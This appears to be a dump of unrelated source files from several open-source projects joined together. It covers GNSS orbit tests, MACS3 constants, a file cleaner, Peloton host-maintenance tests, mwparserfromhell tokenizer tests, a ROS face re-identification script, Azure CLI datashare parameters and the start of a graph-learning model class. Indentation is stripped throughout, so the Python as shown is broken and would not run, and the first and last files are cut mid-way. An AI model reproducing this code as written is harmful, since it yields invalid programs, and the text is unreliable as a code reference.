np.testing.assert_allclose(sat_info_nav[0], sat_info_orbit[0], rtol=0, atol=5)
np.testing.assert_allclose(sat_info_nav[1], sat_info_orbit[1], rtol=0, atol=.1)
np.testing.assert_allclose(sat_info_nav[2], sat_info_orbit[2], rtol=0, atol=1e-7)
np.testing.assert_allclose(sat_info_nav[3], sat_info_orbit[3], rtol=0, atol=1e-11)
'''
def test_nav_vs_orbit__old(self):
dog_orbit = AstroDog(pull_orbit=True)
dog_nav = AstroDog(pull_orbit=False)
for gps_time in gps_times:
for svId in svIds:
sat_info_nav = dog_nav.get_sat_info(svId, gps_time)
sat_info_orbit = dog_orbit.get_sat_info(svId, gps_time)
np.testing.assert_allclose(sat_info_nav[0], sat_info_orbit[0], rtol=0, atol=5)
np.testing.assert_allclose(sat_info_nav[1], sat_info_orbit[1], rtol=0, atol=.1)
np.testing.assert_allclose(sat_info_nav[2], sat_info_orbit[2], rtol=0, atol=1e-7)
np.testing.assert_allclose(sat_info_nav[3], sat_info_orbit[3], rtol=0, atol=1e-11)
if __name__ == "__main__":
unittest.main()
|
MACS3/Utilities/Constants.py | bgruening/MACS | 357 | 12688257 | MACS_VERSION = "3.0.0a7"
MAX_PAIRNUM = 1000
MAX_LAMBDA = 100000
FESTEP = 20
BUFFER_SIZE = 100000 # np array will increase at step of 1 million items
READ_BUFFER_SIZE = 10000000 # 10M bytes for read buffer size
N_MP = 2 # Number of processers
|
Misc/Cleaner/Clean.py | awesome-archive/ReadableWebProxy | 193 | 12688275 |
import common.database as db
import common.util.urlFuncs as urlFuncs
import logging
import os.path
import settings
class Clean(object):
def __init__(self):
print("Clean __init__()")
self.log = logging.getLogger("Main.Cleaner")
super().__init__()
def clean_files(self):
with db.session_context() as sess:
q = sess.query(db.WebFiles) \
.filter(db.WebFiles.fspath != None)
self.log.info("Querying for non-null filepaths...")
have = q.all()
self.log.info("Have %s local files.", len(have))
count = 0
for file in have:
fpath = os.path.join(settings.RESOURCE_DIR, file.fspath)
if not os.path.exists(fpath):
self.log.error("Missing file: %s", fpath)
count += 1
if count % 1000 == 0:
self.log.info("Scanned %s files.", count)
|
tests/integration/misc_test/test_host_maintenance.py | bopopescu/peloton | 617 | 12688278 | import logging
import pytest
import time
from tests.integration.host import (
get_host_in_state,
wait_for_host_state,
is_host_in_state,
draining_period_sec,
)
from peloton_client.pbgen.peloton.api.v0.host import host_pb2 as hpb
from peloton_client.pbgen.peloton.api.v0.task import task_pb2 as task
pytestmark = [
pytest.mark.default,
pytest.mark.preemption,
pytest.mark.random_order(disabled=True),
]
log = logging.getLogger(__name__)
# Tests task kill due to host maintenance with the following scenario
# 1. Create a job (with 4 instances) with host affinity constraint (say host A)
# All 4 instances should transition to RUNNING
# 2. Start Peloton host maintenance on the host A:
# The host draining kicks in and the tasks on host A should be killed in
# the next host draining cycle. The tasks should transition to PENDING as
# host A is DRAINING and there should be no further scheduling on it.
def test__start_maintenance_kill_tasks(host_affinity_job, maintenance):
# Pick a host that is UP and start maintenance on it
test_host = get_host_in_state(hpb.HOST_STATE_UP)
# Set host affinity of the job to the selected host
host_affinity_job.job_config.defaultConfig.constraint.labelConstraint.label.value = (
test_host
)
host_affinity_job.create()
host_affinity_job.wait_for_state(goal_state="RUNNING")
def all_running():
return all(
t.state == task.RUNNING
for t in host_affinity_job.get_tasks().values()
)
host_affinity_job.wait_for_condition(all_running)
constraint = host_affinity_job.job_config.defaultConfig.constraint
test_host = constraint.labelConstraint.label.value
resp = maintenance["start"]([test_host])
assert resp
def all_pending():
return all(
t.state == task.PENDING
for t in host_affinity_job.get_tasks().values()
)
# Wait for tasks to be killed and restarted
host_affinity_job.wait_for_condition(all_pending)
# Tests a typical host lifecycle. The scenario is as follows
# 1. Select a host in UP state.
# 2. Start Peloton host maintenance on host A:
# a. Host A should immediately transition to DRAINING.
#    b. Host A should transition to DOWN, at the latest in the next host
#       draining cycle.
# 3. Complete maintenance on host A:
#    Host A should no longer be DOWN. It should transition to UP
def test__host_maintenance_lifecycle(host_affinity_job, maintenance):
# Pick a host that is UP and start maintenance on it
test_host = get_host_in_state(hpb.HOST_STATE_UP)
# Set host affinity of the job to the selected host
host_affinity_job.job_config.defaultConfig.constraint.labelConstraint.label.value = (
test_host
)
host_affinity_job.create()
# Start maintenance on the selected host
resp = maintenance["start"]([test_host])
assert resp
# Wait for host to transition to DOWN
wait_for_host_state(test_host, hpb.HOST_STATE_DOWN)
# Complete maintenance on the test hosts
resp = maintenance["stop"]([test_host])
assert resp
# Host should no longer be DOWN
assert not is_host_in_state(test_host, hpb.HOST_STATE_DOWN)
wait_for_host_state(test_host, hpb.HOST_STATE_UP)
# Tests the resumption of the draining process on resmgr recovery. The scenario is
# as follows:
# 1. Select a host in UP state:
# 2. Start Peloton host maintenance on host A.
# 3. Restart resmgr: Before restarting resmgr, jobmgr is stopped to ensure
# preemption queue is not polled. On resmgr recovery, the
# draining process should resume and host should transition
# to DOWN
def test__host_draining_resumes_on_resmgr_recovery(
host_affinity_job,
maintenance,
jobmgr,
resmgr,
):
# Pick a host that is UP and start maintenance on it
test_host = get_host_in_state(hpb.HOST_STATE_UP)
# Set host affinity of the job to the selected host
host_affinity_job.job_config.defaultConfig.constraint.labelConstraint.label.value = (
test_host
)
host_affinity_job.create()
def all_running():
return all(
t.state == task.RUNNING
for t in host_affinity_job.get_tasks().values()
)
host_affinity_job.wait_for_condition(all_running)
constraint = host_affinity_job.job_config.defaultConfig.constraint
test_host = constraint.labelConstraint.label.value
resp = maintenance["start"]([test_host])
assert resp
# Stop jobmgr to ensure tasks are not killed
jobmgr.stop()
# Sleep for one draining period to ensure maintenance queue is polled
time.sleep(draining_period_sec)
resmgr.restart()
jobmgr.start()
# Wait for host to transition to DOWN
wait_for_host_state(test_host, hpb.HOST_STATE_DOWN)
# Tests the resumption of the draining process on hostmgr recovery. The scenario is
# as follows:
# 1. Select a host in UP state:
# 2. Start Peloton host maintenance on host A.
# 3. Restart hostmgr: Before restarting hostmgr, resmgr is stopped to ensure
# maintenance queue is not polled. On hostmgr recovery, the
# draining process should resume and host should transition
# to DOWN
def test__host_draining_resumes_on_hostmgr_recovery(
host_affinity_job,
maintenance,
resmgr,
hostmgr,
):
# Pick a host that is UP and start maintenance on it
test_host = get_host_in_state(hpb.HOST_STATE_UP)
# Set host affinity of the job to the selected host
host_affinity_job.job_config.defaultConfig.constraint.labelConstraint.label.value = (
test_host
)
host_affinity_job.create()
def all_running():
return all(
t.state == task.RUNNING
for t in host_affinity_job.get_tasks().values()
)
host_affinity_job.wait_for_condition(all_running)
constraint = host_affinity_job.job_config.defaultConfig.constraint
test_host = constraint.labelConstraint.label.value
# Stop resmgr to ensure maintenance queue is not polled
resmgr.stop()
resp = maintenance["start"]([test_host])
assert resp
hostmgr.restart()
resmgr.start()
# Wait for host to transition to DOWN
wait_for_host_state(test_host, hpb.HOST_STATE_DOWN)
|
tests/test_tokenizer.py | legoktm/mwparserfromhell | 481 | 12688292 | # Copyright (C) 2012-2016 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import codecs
from os import listdir, path
import warnings
import pytest
from mwparserfromhell.parser import contexts, tokens
from mwparserfromhell.parser.builder import Builder
from mwparserfromhell.parser.tokenizer import Tokenizer as PyTokenizer
try:
from mwparserfromhell.parser._tokenizer import CTokenizer
except ImportError:
CTokenizer = None
class _TestParseError(Exception):
"""Raised internally when a test could not be parsed."""
def _parse_test(test, data):
"""Parse an individual *test*, storing its info in *data*."""
for line in test.strip().splitlines():
if line.startswith("name:"):
data["name"] = line[len("name:") :].strip()
elif line.startswith("label:"):
data["label"] = line[len("label:") :].strip()
elif line.startswith("input:"):
raw = line[len("input:") :].strip()
if raw[0] == '"' and raw[-1] == '"':
raw = raw[1:-1]
raw = raw.encode("raw_unicode_escape")
data["input"] = raw.decode("unicode_escape")
elif line.startswith("output:"):
raw = line[len("output:") :].strip()
try:
data["output"] = eval(raw, vars(tokens))
except Exception as err:
raise _TestParseError(err) from err
def _load_tests(filename, name, text):
"""Load all tests in *text* from the file *filename*."""
tests = text.split("\n---\n")
for test in tests:
data = {"name": None, "label": None, "input": None, "output": None}
try:
_parse_test(test, data)
except _TestParseError as err:
if data["name"]:
error = "Could not parse test '{0}' in '{1}':\n\t{2}"
warnings.warn(error.format(data["name"], filename, err))
else:
error = "Could not parse a test in '{0}':\n\t{1}"
warnings.warn(error.format(filename, err))
continue
if not data["name"]:
error = "A test in '{0}' was ignored because it lacked a name"
warnings.warn(error.format(filename))
continue
if data["input"] is None or data["output"] is None:
error = (
"Test '{}' in '{}' was ignored because it lacked an input or an output"
)
warnings.warn(error.format(data["name"], filename))
continue
# Include test filename in name
data["name"] = "{}:{}".format(name, data["name"])
yield data
def build():
"""Load and install all tests from the 'tokenizer' directory."""
directory = path.join(path.dirname(__file__), "tokenizer")
extension = ".mwtest"
for filename in listdir(directory):
if not filename.endswith(extension):
continue
fullname = path.join(directory, filename)
with codecs.open(fullname, "r", encoding="utf8") as fp:
text = fp.read()
name = path.split(fullname)[1][: -len(extension)]
yield from _load_tests(fullname, name, text)
@pytest.mark.parametrize(
"tokenizer",
filter(None, (CTokenizer, PyTokenizer)),
ids=lambda t: "CTokenizer" if t.USES_C else "PyTokenizer",
)
@pytest.mark.parametrize("data", build(), ids=lambda data: data["name"])
def test_tokenizer(tokenizer, data):
expected = data["output"]
actual = tokenizer().tokenize(data["input"])
assert expected == actual
@pytest.mark.parametrize("data", build(), ids=lambda data: data["name"])
def test_roundtrip(data):
expected = data["input"]
actual = str(Builder().build(data["output"][:]))
assert expected == actual
@pytest.mark.skipif(CTokenizer is None, reason="CTokenizer not available")
def test_c_tokenizer_uses_c():
"""make sure the C tokenizer identifies as using a C extension"""
assert CTokenizer.USES_C is True
assert CTokenizer().USES_C is True
def test_describe_context():
assert "" == contexts.describe(0)
ctx = contexts.describe(contexts.TEMPLATE_PARAM_KEY | contexts.HAS_TEXT)
assert "TEMPLATE_PARAM_KEY|HAS_TEXT" == ctx
|
recognition/scripts/eval/eval_reid.py | aaramirezd/open_ptrack_v2 | 218 | 12688297 | #!/usr/bin/python
import csv
import rospy
import rospkg
import cv_bridge
import message_filters
from std_msgs.msg import *
from sensor_msgs.msg import *
from geometry_msgs.msg import *
from opt_msgs.msg import *
from dynamic_reconfigure.server import Server
from recognition.cfg import FaceFeatureExtractionConfig
from face_comparing.srv import *
class EvalReidNode:
def __init__(self):
self.appeared_time = {}
self.recognized_ids = {}
self.face_name = {}
self.read_data()
self.recognition_time = []
self.success = 0
self.failure = 0
subs = [
message_filters.Subscriber('/face_recognition/people_tracks', TrackArray),
message_filters.Subscriber('/tracker/tracks_smoothed', TrackArray)
]
self.sync = message_filters.TimeSynchronizer(subs, 100)
self.sync.registerCallback(self.callback)
def read_data(self):
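        # 'data2' is assumed to hold one person per row, space-separated:
        #   "<name> <track_id> <track_id> ..."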
names = {}
n = 0
for line in csv.reader(open('data2', 'r'), delimiter=' '):
for id in line[1:]:
names[int(id)] = line[0]
n += 1
n -= 1
print names, n
self.names = names
self.face_name = {0: 'Kenji', 1: 'Francisca', 2: 'Enrico', 3: 'Andrea', 4: 'Yongheng', 5: 'Stefano'}
def callback(self, face_msg, track_msg):
for face, track in zip(face_msg.tracks, track_msg.tracks):
track_id = track.id
face_id = face.id
if track_id not in self.names:
continue
if track_id not in self.appeared_time:
self.appeared_time[track_id] = rospy.Time.now()
if face_id < 10000 and track_id not in self.recognized_ids:
self.recognized_ids[track_id] = (rospy.Time.now() - self.appeared_time[track_id]).to_sec()
self.recognition_time.append(self.recognized_ids[track_id])
print track_id, face_id, self.names[track_id]
if face_id in self.face_name:
if self.face_name[face_id] != self.names[track_id]:
self.failure += 1
else:
self.success += 1
self.face_name[face_id] = self.names[track_id]
print self.failure, self.success, sum(self.recognition_time) / len(self.recognition_time)
print self.face_name
def main():
rospy.init_node('eval_reid')
node = EvalReidNode()
rospy.spin()
if __name__ == '__main__':
main()
|
src/datashare/azext_datashare/manual/_params.py | Mannan2812/azure-cli-extensions | 207 | 12688310 | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long
# pylint: disable=too-many-lines
# pylint: disable=too-many-statements
# pylint: disable=unused-import
from knack.arguments import CLIArgumentType
from azure.cli.core.commands.parameters import (
tags_type,
get_enum_type,
resource_group_name_type,
get_location_type,
get_datetime_type
)
from azure.cli.core.commands.validators import get_default_location_from_resource_group, validate_file_or_dict
from azext_datashare.vendored_sdks.datashare.models._data_share_management_client_enums import ShareKind, Kind, SynchronizationMode, SynchronizationKind, RecurrenceInterval
from azext_datashare.manual._validators import invitation_id_validator
def load_arguments(self, _):
with self.argument_context('datashare account list') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
with self.argument_context('datashare account show') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', options_list=['--name', '-n'], id_part='name', help='The name of the share account.') # modified
with self.argument_context('datashare account create') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', options_list=['--name', '-n'], help='The name of the share account.') # modified
c.argument('location', arg_type=get_location_type(self.cli_ctx), validator=get_default_location_from_resource_group) # modified
c.argument('tags', tags_type) # modified
c.ignore('identity') # Only system assigned identity is supported, we can omit this option
with self.argument_context('datashare account update') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', options_list=['--name', '-n'], id_part='name', help='The name of the share account.') # modified
c.argument('tags', tags_type) # modified
with self.argument_context('datashare account delete') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', options_list=['--name', '-n'], id_part='name', help='The name of the share account.')
with self.argument_context('datashare account wait') as c:
c.argument('account_name', options_list=['--name', '-n'], id_part='name', help='The name of the share account.') # modified
with self.argument_context('datashare list') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
with self.argument_context('datashare show') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', options_list=['--name', '-n'], id_part='child_name_1', help='The name of the share.') # modified
with self.argument_context('datashare create') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_name', options_list=['--name', '-n'], help='The name of the share.') # modified
c.argument('description', help='Share description.') # modified
c.argument('share_kind', arg_type=get_enum_type(ShareKind), help='Share kind.') # modified
c.argument('terms', help='Share terms.') # modified
with self.argument_context('datashare delete') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', options_list=['--name', '-n'], id_part='child_name_1', help='The name of the share.') # modified
with self.argument_context('datashare wait') as c:
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', options_list=['--name', '-n'], id_part='child_name_1', help='The name of the share.') # modified
with self.argument_context('datashare dataset list') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_name', help='The name of the share.')
with self.argument_context('datashare dataset show') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('data_set_name', options_list=['--name', '-n'], id_part='child_name_2', help='The name of the dataset.') # modified
with self.argument_context('datashare dataset create') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_name', help='The name of the share.')
c.argument('data_set_name', options_list=['--name', '-n'], help='The name of the dataset.') # modified
c.argument('data_set', options_list=['--dataset'], type=validate_file_or_dict, help='Dataset parameters in JSON string or path to JSON file.') # modified
with self.argument_context('datashare dataset delete') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('data_set_name', options_list=['--name', '-n'], id_part='child_name_2', help='The name of the dataset.') # modified
with self.argument_context('datashare dataset wait') as c:
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('data_set_name', options_list=['--name', '-n'], id_part='child_name_2', help='The name of the dataset.') # modified
with self.argument_context('datashare invitation list') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_name', help='The name of the share.')
with self.argument_context('datashare invitation show') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('invitation_name', options_list=['--name', '-n'], id_part='child_name_2', help='The name of the invitation.') # modified
with self.argument_context('datashare invitation create') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_name', help='The name of the share.')
c.argument('invitation_name', options_list=['--name', '-n'], help='The name of the invitation.') # modified
c.argument('target_active_directory_id', help='The target Azure AD Id. Can\'t be combined with email.') # modified
c.argument('target_email', help='The email the invitation is directed to.') # modified
c.argument('target_object_id', help='The target user or application Id that invitation is being sent to. Must be specified along TargetActiveDirectoryId. This enables sending invitations to specific users or applications in an AD tenant.') # modified
with self.argument_context('datashare invitation delete') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('invitation_name', options_list=['--name', '-n'], id_part='child_name_2', help='The name of the invitation.') # modified
with self.argument_context('datashare synchronization-setting list') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_name', help='The name of the share.')
with self.argument_context('datashare synchronization-setting show') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('synchronization_setting_name', options_list=['--name', '-n'], id_part='child_name_2', help='The name of the synchronizationSetting.') # modified
with self.argument_context('datashare synchronization-setting create') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_name', help='The name of the share.')
c.argument('synchronization_setting_name', options_list=['--name', '-n'], help='The name of the synchronizationSetting.') # modified
c.argument('recurrence_interval', arg_type=get_enum_type(RecurrenceInterval), arg_group='Synchronization Setting', help='Synchronization Recurrence Interval.')
c.argument('synchronization_time', arg_group='Synchronization Setting', arg_type=get_datetime_type(help='Synchronization time.'))
c.argument('kind', arg_type=get_enum_type(SynchronizationKind), arg_group='Synchronization Setting', default='ScheduleBased', help='Kind of synchronization.')
with self.argument_context('datashare synchronization-setting delete') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('synchronization_setting_name', options_list=['--name', '-n'], id_part='child_name_2', help='The name of the synchronizationSetting.') # modified
with self.argument_context('datashare synchronization-setting wait') as c:
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('synchronization_setting_name', options_list=['--name', '-n'], id_part='child_name_2', help='The name of the synchronizationSetting.') # modified
with self.argument_context('datashare synchronization list-detail') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.') # modified
c.argument('share_name', help='The name of the share.') # modified
c.argument('synchronization_id', help='The synchronization GUID.')
with self.argument_context('datashare synchronization list') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.') # modified
c.argument('share_name', help='The name of the share.') # modified
with self.argument_context('datashare provider-share-subscription list') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_name', help='The name of the share.')
with self.argument_context('datashare provider-share-subscription show') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('provider_share_subscription_id', options_list=['--share-subscription'], id_part='child_name_2', help='To locate share subscription') # modified TODO validator
with self.argument_context('datashare provider-share-subscription revoke') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('provider_share_subscription_id', options_list=['--share-subscription'], id_part='child_name_2', help='To locate share subscription') # modified
with self.argument_context('datashare provider-share-subscription reinstate') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('provider_share_subscription_id', options_list=['--share-subscription'], id_part='child_name_2', help='To locate share subscription') # modified
with self.argument_context('datashare provider-share-subscription wait') as c:
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_name', id_part='child_name_1', help='The name of the share.') # modified
c.argument('provider_share_subscription_id', options_list=['--share-subscription'], id_part='child_name_2', help='To locate share subscription') # modified
with self.argument_context('datashare consumer invitation list') as c:
pass
with self.argument_context('datashare consumer invitation show') as c:
c.argument('location', arg_type=get_location_type(self.cli_ctx)) # modified
c.argument('invitation_id', validator=invitation_id_validator, help='An invitation id')
with self.argument_context('datashare consumer invitation reject') as c:
c.argument('location', arg_type=get_location_type(self.cli_ctx)) # modified
c.argument('invitation_id', validator=invitation_id_validator, help='An invitation id') # modified
with self.argument_context('datashare consumer share-subscription list') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
with self.argument_context('datashare consumer share-subscription show') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_subscription_name', options_list=['--name', '-n'], id_part='child_name_1', help='The name of the share subscription.') # modified
with self.argument_context('datashare consumer share-subscription create') as c:
from azure.cli.core.commands.parameters import get_location_name_type, get_location_completion_list
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', options_list=['--name', '-n'], help='The name of the share subscription.') # modified
c.argument('invitation_id', validator=invitation_id_validator, help='The invitation id.') # modified
c.argument('source_share_location', type=get_location_name_type(self.cli_ctx), help='Source share location.', completer=get_location_completion_list) # modified
with self.argument_context('datashare consumer share-subscription delete') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_subscription_name', options_list=['--name', '-n'], id_part='child_name_1', help='The name of the share subscription.') # modified
with self.argument_context('datashare consumer share-subscription list-source-share-synchronization-setting') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', help='The name of the share subscription.')
with self.argument_context('datashare consumer share-subscription list-source-dataset') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', help='The name of the share subscription.')
with self.argument_context('datashare consumer share-subscription wait') as c:
c.argument('account_name', id_part='name', help='The name of the share account.')
c.argument('share_subscription_name', options_list=['--name', '-n'], id_part='child_name_1', help='The name of the share subscription.') # modified
with self.argument_context('datashare consumer share-subscription synchronization start') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', help='The name of the share subscription.')
c.argument('synchronization_mode', arg_type=get_enum_type(SynchronizationMode), help='Synchronization mode') # modified
with self.argument_context('datashare consumer share-subscription synchronization cancel') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', help='The name of the share subscription.')
c.argument('synchronization_id', help='The synchronization GUID')
with self.argument_context('datashare consumer share-subscription synchronization wait') as c:
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', help='The name of the share subscription.')
c.argument('synchronization_id', help='The synchronization GUID')
with self.argument_context('datashare consumer share-subscription synchronization list') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', help='The name of the share subscription.')
with self.argument_context('datashare consumer share-subscription synchronization list-detail') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', help='The name of the share subscription.')
c.argument('synchronization_id', help='Synchronization id')
with self.argument_context('datashare consumer dataset-mapping list') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', help='The name of the share subscription.')
with self.argument_context('datashare consumer dataset-mapping show') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.')
c.argument('share_subscription_name', id_part='child_name_1', help='The name of the share subscription.')
c.argument('data_set_mapping_name', id_part='child_name_2', options_list=['--name', '-n'], help='The name of the datasetMapping.') # modified
with self.argument_context('datashare consumer dataset-mapping create') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', help='The name of the share subscription.')
c.argument('data_set_mapping_name', options_list=['--name', '-n'], help='The name of the datasetMapping.') # modified
c.argument('data_set_mapping', options_list=['--mapping'], type=validate_file_or_dict, help='Dataset mapping in JSON string or path to JSON file.') # modified
with self.argument_context('datashare consumer dataset-mapping delete') as c: # modified
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.')
c.argument('share_subscription_name', id_part='child_name_1', help='The name of the share subscription.')
c.argument('data_set_mapping_name', id_part='child_name_2', options_list=['--name', '-n'], help='The name of the datasetMapping.') # modified
with self.argument_context('datashare consumer dataset-mapping wait') as c:
c.argument('account_name', id_part='name', help='The name of the share account.')
c.argument('share_subscription_name', id_part='child_name_1', help='The name of the share subscription.')
c.argument('data_set_mapping_name', id_part='child_name_2', options_list=['--name', '-n'], help='The name of the datasetMapping.') # modified
with self.argument_context('datashare consumer trigger list') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', help='The name of the share subscription.')
with self.argument_context('datashare consumer trigger show') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.')
c.argument('share_subscription_name', id_part='child_name_1', help='The name of the share subscription.')
c.argument('trigger_name', options_list=['--name', '-n'], id_part='child_name_2', help='The name of the trigger.')
with self.argument_context('datashare consumer trigger create') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', help='The name of the share account.')
c.argument('share_subscription_name', help='The name of the share subscription.')
c.argument('trigger_name', options_list=['--name', '-n'], help='The name of the trigger.') # modified
c.argument('recurrence_interval', arg_type=get_enum_type(RecurrenceInterval), arg_group='Synchronization Setting', help='Synchronization Recurrence Interval.')
c.argument('synchronization_time', arg_group='Synchronization Setting', arg_type=get_datetime_type(help='Synchronization time.'))
c.argument('kind', arg_type=get_enum_type(SynchronizationKind), arg_group='Synchronization Setting', default='ScheduleBased', help='Kind of synchronization.')
with self.argument_context('datashare consumer trigger delete') as c:
c.argument('resource_group_name', resource_group_name_type) # modified
c.argument('account_name', id_part='name', help='The name of the share account.') # modified
c.argument('share_subscription_name', id_part='child_name_1', help='The name of the share subscription.') # modified
c.argument('trigger_name', options_list=['--name', '-n'], id_part='child_name_2', help='The name of the trigger.') # modified
with self.argument_context('datashare consumer trigger wait') as c:
c.argument('trigger_name', options_list=['--name', '-n'], id_part='child_name_2', help='The name of the trigger.') # modified
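# Illustrative CLI sketch (resource names and enum values are hypothetical;
# option names follow the argument registrations above):
#
#   az datashare account create -g MyResourceGroup -n MyAccount -l eastus
#   az datashare create -g MyResourceGroup --account-name MyAccount \
#       -n MyShare --description "demo share" --share-kind CopyBased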
|
src/core/model.py | yuanqidu/IDGL | 153 | 12688320 | import os
import random
import numpy as np
from collections import Counter
from sklearn.metrics import r2_score
import torch
import torch.nn as nn
import torch.optim as optim
from torch.optim.lr_scheduler import ReduceLROnPlateau
import torch.nn.functional as F
from .models.graph_clf import GraphClf
from .models.text_graph import TextGraphRegression, TextGraphClf
from .utils.text_data.vocab_utils import VocabModel
from .utils import constants as Constants
from .utils.generic_utils import to_cuda, create_mask
from .utils.constants import INF
from .utils.radam import RAdam
class Model(object):
"""High level model that handles intializing the underlying network
architecture, saving, updating examples, and predicting examples.
"""
